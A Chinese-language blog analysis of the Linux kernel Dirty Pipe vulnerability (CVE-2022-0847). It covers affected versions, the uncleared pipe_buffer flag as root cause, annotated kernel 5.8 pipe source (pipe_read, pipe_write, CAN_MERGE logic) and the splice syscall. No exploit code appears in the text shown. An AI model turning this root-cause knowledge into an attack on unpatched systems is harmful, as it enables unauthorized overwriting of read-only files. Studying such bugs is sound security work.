CVE-2022-0847(Dirty Pipe) Remake

本文最后更新于:2024年3月22日 早上

0x00:写在一切之前

Dirty系列第二弹

因为该漏洞发现在对管道写入数据后,读取完毕后未清空pipe_buffer->flags,造成越权写入只读文件

与Dirty Cow很像,因此被冠以Dirty Pipe的称呼

但是和Dirty Cow需要线程竞争相比,Dirty Pipe稳定许多

PS:下文所有源码的版本为 5.8

0x01:信息收集

NVD - cve-2022-0847 (nist.gov)

影响版本:Linux kernel 5.8 及之后的版本,已在 5.16.11、5.15.25、5.10.102 中修复

0x02:前置知识

何为导管🤔

何为管道?好问题,所谓管道,就是连接一个写进程与一个读进程,用于两进程间通信的共享文件,又称pipe文件

向管道(共享文件)提供输入的发送进程(即写进程),以字符流形式将大量的数据送入管道;而接收管道输出的接收进程(即读进程),可从管道中接收数据。由于发送进程和接收进程是利用管道进行通信的,故又称管道通信。

为了协调双方的通信,管道通信机制必须提供以下3 方面的协调能力。

  • 互斥。当一个进程正在对 pipe 进行读/写操作时,另一个进程必须等待。
  • 同步。当写(输入)进程把一定数量(如4KB)数据写入 pipe 后,便去睡眠等待,直到读(输出)进程取走数据后,再把它唤醒。当读进程读到一空 pipe 时,也应睡眠等待,直至写进程将数据写入管道后,才将它唤醒。
  • 对方是否存在。只有确定对方已存在时,才能进行通信。

pipe の 调用链

接下来就来看看pipe的实现过程

1
2
3
4
5
do_pipe2
__do_pipe_flags
create_pipe_files
get_pipe_inode
alloc_pipe_info

do_pipe2

pipe和pipe2都是系统调用,都是do_pipe2的套娃,不同的是,pipe2能自己指定flags

1
2
3
4
5
6
7
8
9
/* pipe2(2) entry point: hands the caller-supplied flags straight to do_pipe2(). */
SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}

/* pipe(2) entry point: identical to pipe2() except that flags is always 0. */
SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
/*
* do_pipe2 - shared backend of the pipe() and pipe2() system calls.
* @fildes: user-space destination for the two descriptors (sizeof(int[2]) bytes)
* @flags:  passed through unchanged to __do_pipe_flags()
*
* Returns 0 on success, the error reported by __do_pipe_flags(), or -EFAULT
* when the descriptor pair cannot be copied out to user space.
*/
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;
/* Core step: fills fd[] and files[]; a zero return means success. */
error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
/* Copy-out failed: drop both files and hand back both reserved fd numbers. */
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {/* Copy-out succeeded: bind each reserved descriptor to its file. */
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}

__do_pipe_flags

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/*
* __do_pipe_flags - create the two pipe files and reserve two descriptors.
* @fd:    out: fd[0] receives the read-side number, fd[1] the write-side number
* @files: out: the file pair produced by create_pipe_files()
* @flags: only O_CLOEXEC, O_NONBLOCK, O_DIRECT and O_NOTIFICATION_PIPE are accepted
*
* The descriptors are only reserved here; the caller installs them.
* Returns 0 on success or a negative errno.
*/
static int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;

/* Any bit outside the accepted set is rejected up front. */
if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;

error = create_pipe_files(files, flags);/* core step: build both file objects */
if (error)
return error;

/* Reserve two unused descriptor numbers; on failure unwind via the labels below. */
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_read_pipe;
fdr = error;

error = get_unused_fd_flags(flags);
if (error < 0)
goto err_fdr;
fdw = error;

audit_fd_pair(fdr, fdw);/* presumably records the pair for auditing; helper not shown here */
fd[0] = fdr;
fd[1] = fdw;
return 0;

/* Unwind in reverse order: the already-reserved read fd first, then both files. */
err_fdr:
put_unused_fd(fdr);
err_read_pipe:
fput(files[0]);
fput(files[1]);
return error;
}

create_pipe_files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
* create_pipe_files - build the read and write struct file for a new pipe.
* @res:   out: res[0] is the O_RDONLY file, res[1] the O_WRONLY file
* @flags: pipe2()-style flags; O_NONBLOCK applies to both ends, O_DIRECT only
*         to the write end, O_NOTIFICATION_PIPE requests a watch queue
*
* Returns 0 on success or a negative errno (-ENFILE, -ENOMEM, -ENOPKG, or the
* error encoded in a failed file allocation).
*/
int create_pipe_files(struct file **res, int flags)
{
struct inode *inode = get_pipe_inode();/* fresh pipe inode with its pipe_inode_info attached */
struct file *f;

if (!inode)
return -ENFILE;

if (flags & O_NOTIFICATION_PIPE) {
#ifdef CONFIG_WATCH_QUEUE
if (watch_queue_init(inode->i_pipe) < 0) {
iput(inode);
return -ENOMEM;
}
#else
return -ENOPKG;
#endif
}
/*
* Allocate the write-end pseudo file on the pipe inode, using pipefifo_fops
* as its file operations. On failure free the pipe info, drop the inode and
* return the encoded error.
*/
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipefifo_fops);
if (IS_ERR(f)) {
free_pipe_info(inode->i_pipe);
iput(inode);
return PTR_ERR(f);
}
/* private_data points at the pipe_inode_info (inode->i_pipe), not at the inode. */
f->private_data = inode->i_pipe;
/*
* Clone the write-end file into an O_RDONLY read end with the same fops.
* On failure put the pipe info, drop the write-end file and return the error.
*/
res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
&pipefifo_fops);
if (IS_ERR(res[0])) {
put_pipe_info(inode, inode->i_pipe);
fput(f);
return PTR_ERR(res[0]);
}
res[0]->private_data = inode->i_pipe;
res[1] = f;
stream_open(inode, res[0]);
stream_open(inode, res[1]);
return 0;
}

get_pipe_inode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
/*
* get_pipe_inode - allocate a pseudo inode on pipe_mnt and attach a new pipe.
*
* Returns the initialised inode, or NULL when either the inode or the
* pipe_inode_info cannot be allocated.
*/
static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;

if (!inode)
goto fail_inode;

inode->i_ino = get_next_ino();
/* Allocate the pipe_inode_info that holds this pipe's state. */
pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;

inode->i_pipe = pipe;
/* Starts out with two files, one reader and one writer. */
pipe->files = 2;
pipe->readers = pipe->writers = 1;
/* The inode uses the shared pipe/FIFO file operations. */
inode->i_fop = &pipefifo_fops;

/*
* Mark the inode dirty from the very beginning,
* that way it will never be moved to the dirty
* list because "mark_inode_dirty()" will think
* that it already _is_ on the dirty list.
*/
/* Per the comment above, I_DIRTY here keeps the inode off the dirty list; it is not a write-back request. */
inode->i_state = I_DIRTY;
inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
inode->i_atime = inode->i_mtime = inode->i_ctime = current_time(inode);

return inode;

fail_iput:
iput(inode);

fail_inode:
return NULL;
}

alloc_pipe_info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
/*
* alloc_pipe_info - allocate and initialise a pipe_inode_info and its ring.
*
* Charges the buffers to the current user, shrinks the ring to a single
* buffer when the soft limit is exceeded, and gives up when the hard limit
* is exceeded (both only for unprivileged users).
*
* Returns the new pipe, or NULL on allocation failure or hard-limit refusal.
*/
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
/* Default ring size in buffers (the article states 16; the definition is not shown here). */
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
/* Current user; the reference is released with free_uid() on the failure path. */
struct user_struct *user = get_current_user();
unsigned long user_bufs; /* value returned by account_pipe_buffers() below */
unsigned int max_size = READ_ONCE(pipe_max_size);/* snapshot of the global size limit */
/* Zeroing allocation of the pipe descriptor; on failure only the user reference needs dropping. */
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
/* Without CAP_SYS_RESOURCE the ring may not exceed max_size bytes: clamp the buffer count. */
if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;
/* Charge pipe_bufs buffers to the user (old = 0, new = pipe_bufs); presumably returns the user's new total. */
user_bufs = account_pipe_buffers(user, 0, pipe_bufs);
/* Over the soft limit as an unprivileged user: re-account down to one buffer. */
if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, 1);
pipe_bufs = 1;
}
/* Over the hard limit as an unprivileged user: refuse and undo the accounting. */
if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;
/* Zeroing allocation of the pipe_buffer ring: pipe_bufs slots. */
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}

/* Failure paths: un-charge the buffers, free the descriptor, drop the user reference. */
out_revert_acct:
(void) account_pipe_buffers(user, pipe_bufs, 0);
kfree(pipe);
out_free_uid:
free_uid(user);
return NULL;
}

pipe_inode_info

管道的实质是由一个 pipe_inode_info 结构体来管理的,其 pipe_buffer 数组(bufs)是一个环形队列。写入操作在 head 处放入数据并使 head 前移,读取操作从 tail 处取出数据并使 tail 前移。也就是说,在管道的 pipe_inode_info 结构体中,head 成员是生产(写入)位置的索引,tail 成员是消费(读取)位置的索引,头进尾出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;	/* advanced by writers (production side) */
unsigned int tail;	/* advanced by readers (consumption side) */
unsigned int max_usage;
unsigned int ring_size;	/* callers index the ring with (ring_size - 1) as a mask */
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

pipe_buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;	/* PIPE_BUF_FLAG_* bits, e.g. PIPE_BUF_FLAG_CAN_MERGE or PIPE_BUF_FLAG_PACKET */
unsigned long private;
};

pipe的大体结构图如下所示(图来自A3👴的blog)

pipeの函数表

经过如下调用链

1
2
3
4
do_pipe2
__do_pipe_flags
create_pipe_files
alloc_file_pseudo
1
2
3
4
/*
* Excerpt from create_pipe_files(): allocate the write-end pseudo file on the
* pipe inode, opened O_WRONLY plus any O_NONBLOCK/O_DIRECT bits taken from
* flags, with pipefifo_fops installed as its file operations.
*/
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipefifo_fops);

pipefifo_fops

1
2
3
4
5
6
7
8
9
10
/*
* File operations shared by both ends of a pipe: reads go through
* pipe_read(), writes through pipe_write().
*/
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
};

重点关注读写操作

pipe_read

从pipe中读取数据,会调用到pipe_read

一个接一个的读取buffer中的数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
/*
* pipe_read - ->read_iter handler for pipes (installed via pipefifo_fops).
* @iocb: I/O control block; iocb->ki_filp is the pipe's read-side file
* @to:   destination iterator; its byte count is the amount requested
*
* Drains pipe buffers starting at pipe->tail, one buffer at a time, until the
* request is satisfied, the pipe runs dry, or an error occurs. Blocks when
* nothing has been read yet, writers still exist and O_NONBLOCK is not set.
*
* Returns the number of bytes read, 0 for an empty request or when no data
* and no writers remain, or a negative errno.
*
* Note: nothing in this function ever assigns buf->flags, so a released slot
* keeps whatever flag bits it had.
*/
static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;/* was the pipe full / should the next reader be woken */
ssize_t ret;

/* Null read succeeds. */
/* A zero-length request returns 0 immediately, before the lock is taken. */
if (unlikely(total_len == 0))
return 0;

ret = 0;
/* Hold the pipe lock while walking the ring. */
__pipe_lock(pipe);

/*
* We only wake up writers if the pipe was full when we started
* reading in order to avoid unnecessary wakeups.
*
* But when we do wake up writers, we do so using a sync wakeup
* (WF_SYNC), because we want them to get going and generate more
* data for us.
*/
/* Remember whether the ring was full on entry; pipe_full() judges head/tail against max_usage. */
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
/* Loop until the request is satisfied, an error occurs, or there is nothing more to do. */
for (;;) {
/*
* head is the production point (where writers add buffers) and tail is the
* consumption point (the buffer this reader takes next). mask wraps a
* counter into a valid index of the bufs[] ring.
*/
unsigned int head = pipe->head;
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;

#ifdef CONFIG_WATCH_QUEUE
/*
* A loss was flagged: emit a WATCH_META_LOSS_NOTIFICATION record first.
* With fewer than 8 bytes left in the request, stop with -ENOBUFS (unless
* some data was already returned).
*/
if (pipe->note_loss) {
struct watch_notification n;

if (total_len < 8) {
if (ret == 0)
ret = -ENOBUFS;
break;
}

n.type = WATCH_TYPE_META;
n.subtype = WATCH_META_LOSS_NOTIFICATION;
n.info = watch_sizeof(n);
if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
if (ret == 0)
ret = -EFAULT;
break;
}
ret += sizeof(n);
total_len -= sizeof(n);
pipe->note_loss = false;
}
#endif
/* There is at least one buffer to consume. */
if (!pipe_empty(head, tail)) {

struct pipe_buffer *buf = &pipe->bufs[tail & mask];/* buffer at the consumption point */
size_t chars = buf->len;/* bytes available in this buffer */
size_t written;
int error;
/*
* The buffer holds more than was asked for: read only total_len bytes,
* unless it is a PIPE_BUF_FLAG_WHOLE buffer, which cannot be split
* (-ENOBUFS).
*/
if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}
/* Let the buffer's ops confirm its contents before use. */
error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}
/* Copy chars bytes out of the buffer's page into the destination iterator. */
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
/* Account the bytes just consumed from this buffer. */
ret += chars;
buf->offset += chars;
buf->len -= chars;

/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}
/* Buffer drained: release it and advance tail under rd_wait.lock. buf->flags is left as it was. */
if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
if (buf->flags & PIPE_BUF_FLAG_LOSS)
pipe->note_loss = true;
#endif
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
/* Bytes still wanted by the caller. */
total_len -= chars;
/* Done when the request is satisfied; otherwise keep going while buffers remain. */
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
/* No writers left: stop with whatever has been read so far. */
if (!pipe->writers)
break;
/* Something was read, or an error is pending: return it rather than block. */
if (ret)
break;
/* Nothing read and the file is non-blocking: -EAGAIN. */
if (filp->f_flags & O_NONBLOCK) {
ret = -EAGAIN;
break;
}
__pipe_unlock(pipe);

/*
* We only get here if we didn't actually read anything.
*
* However, we could have seen (and removed) a zero-sized
* pipe buffer, and might have made space in the buffers
* that way.
*
* You can't make zero-sized pipe buffers by doing an empty
* write (not even in packet mode), but they can happen if
* the writer gets an EFAULT when trying to fill a buffer
* that already got allocated and inserted in the buffer
* array.
*
* So we still need to wake up any pending writers in the
* _very_ unlikely case that the pipe was full, but we got
* no data.
*/
/*
* Lock dropped and nothing read: if the pipe had been full, wake waiting
* writers and send their SIGIO; then sleep until the pipe is readable,
* returning -ERESTARTSYS if the wait is interrupted.
*/
if (unlikely(was_full)) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}

/*
* But because we didn't read anything, at this point we can
* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;

__pipe_lock(pipe);
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
wake_next_reader = true;
}
/* With the pipe empty there is nothing for another reader to fetch: cancel that wakeup. */
if (pipe_empty(pipe->head, pipe->tail))
wake_next_reader = false;
__pipe_unlock(pipe);

if (was_full) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
if (wake_next_reader)
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
if (ret > 0)
file_accessed(filp);
return ret;
}

pipe_write

向pipe中写入,会调用到pipe_write

首先,如果上一个buffer中有剩余空间,并且此buffer的flag设置了PIPE_BUF_FLAG_CAN_MERGE,会先将数据写入此buffer的剩余空间

若还有多的数据,会申请新的buffer,将flag设置为PIPE_BUF_FLAG_CAN_MERGE,继续写入

由此可见,PIPE_BUF_FLAG_CAN_MERGE决定了buffer有无写入权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
/*
* pipe_write - ->write_iter handler for pipes (installed via pipefifo_fops).
* @iocb: I/O control block; iocb->ki_filp is the pipe's write-side file
* @from: source iterator; its byte count is the amount to write
*
* First tries to append the sub-page remainder of the write to the most
* recently produced buffer when that buffer carries PIPE_BUF_FLAG_CAN_MERGE
* and has room. Everything else is written into freshly claimed ring slots,
* one page each, flagged PACKET or CAN_MERGE.
*
* Returns the number of bytes written, 0 for an empty write, or a negative
* errno (-EPIPE, -EXDEV, -EFAULT, -ENOMEM, -EAGAIN, -ERESTARTSYS, or an error
* from pipe_buf_confirm()/file_update_time()).
*/
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

/* Null write succeeds. */
/* A zero-length write returns 0 immediately, before the lock is taken. */
if (unlikely(total_len == 0))
return 0;
/* Hold the pipe lock while touching the ring. */
__pipe_lock(pipe);
/* No readers: raise SIGPIPE on the current task and fail with -EPIPE. */
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}

#ifdef CONFIG_WATCH_QUEUE
/* A pipe that has a watch_queue attached refuses ordinary writes with -EXDEV. */
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif

/*
* Only wake up if the pipe started out empty, since
* otherwise there should be no readers waiting.
*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligs the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);/* true when the ring held no buffers on entry */
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {/* only the sub-page remainder is a merge candidate, and only if data is already queued */
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
int offset = buf->offset + buf->len;
/* Merge only when the previous buffer is flagged CAN_MERGE and the data still fits in its page. */
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);/* write straight into the existing page */
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}
/* Loop until all data is queued or an error/stop condition is hit. */
for (;;) {
/* Readers may have gone away while we slept: SIGPIPE, and -EPIPE if nothing was written yet. */
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
/* Ring not full: claim a new slot and fill it. */
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

/* Allocate a slot in the ring in advance and attach an
* empty buffer. If we fault or otherwise fail to use
* it, either the reader will consume it or it'll still
* be there for the next write.
*/
spin_lock_irq(&pipe->rd_wait.lock);

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);

/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp))/* packet-mode pipe (presumably O_DIRECT; helper not shown) gets PACKET, otherwise CAN_MERGE */
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;

if (!iov_iter_count(from))
break;
}

if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;

/* Wait for buffer space to become available. */
/* Non-blocking file: stop here, with -EAGAIN if nothing was written. */
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
/* A signal is pending: stop here, with -ERESTARTSYS if nothing was written. */
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}

/*
* We're going to release the pipe lock and wait for more
* space. We wake up any readers if necessary, and then
* after waiting we need to re-check whether the pipe
* become empty while we dropped the lock.
*/
/*
* Drop the lock, wake readers if the pipe started out empty, sleep until the
* pipe is writable, then retake the lock and re-sample was_empty.
*/
__pipe_unlock(pipe);
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
__pipe_lock(pipe);
was_empty = pipe_empty(pipe->head, pipe->tail);
wake_next_writer = true;
}
out:
/* If the ring is full at this point, another writer could not make progress: cancel that wakeup. */
if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
wake_next_writer = false;
__pipe_unlock(pipe);

/*
* If we do do a wakeup event, we do a 'sync' wakeup, because we
* want the reader to start processing things asap, rather than
* leave the data pending.
*
* This is particularly important for small writes, because of
* how (for example) the GNU make jobserver uses small writes to
* wake up pending jobs
*/
/* Lock already released: wake readers if the pipe was empty when last sampled. */
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
/* Pass the baton to the next waiting writer if we slept and space remains. */
if (wake_next_writer)
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
/*
* Bytes were written and the superblock write trylock succeeded: call
* file_update_time(); its error, if any, replaces the byte count.
*/
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
int err = file_update_time(filp);
if (err)
ret = err;
sb_end_write(file_inode(filp)->i_sb);
}
/* Bytes written, or a negative errno. */
return ret;
}

何为splice

一般来说,想要把一个文件的数据拷贝到另一个文件中,常规思路便是打开文件1,复制到用户空间,写入文件2

但这样用户空间和内核空间之间要进行多次数据拷贝,存在可观的开销

所以这时候便要提到splice这个用于在两个文件描述符之间移动数据的系统调用啦

splice 函数是在 Unix/Linux 系统中用于在两个文件描述符之间移动数据的系统调用之一。它通常用于优化数据传输,特别是在文件和管道之间进行零拷贝传输。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <fcntl.h>
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

参数说明
fd_in:输入文件描述符,数据将从这里读取。
off_in:输入文件的偏移量指针,如果为 NULL,则使用当前文件偏移量。
fd_out:输出文件描述符,数据将写入到这里。
off_out:输出文件的偏移量指针,如果为 NULL,则使用当前文件偏移量。
len:要移动的数据的长度。
flags:标志参数,可以是以下之一或它们的组合:
SPLICE_F_MOVE:尝试移动页面而不是拷贝页面。这只是给内核的一个提示:若内核无法从管道中移动页面,仍然会进行拷贝(按照 man 手册,自 Linux 2.6.21 起该标志实际上不起作用)。
SPLICE_F_NONBLOCK:非阻塞模式,如果设置了此标志,函数将以非阻塞模式运行。
SPLICE_F_MORE:提示内核等待更多数据,如果设置了此标志,则告诉内核还有更多数据需要移动。这可能会增加性能。
SPLICE_F_GIFT:splice() 并不使用该标志,它用于 vmsplice(2),表示把用户页面"赠送"给内核。

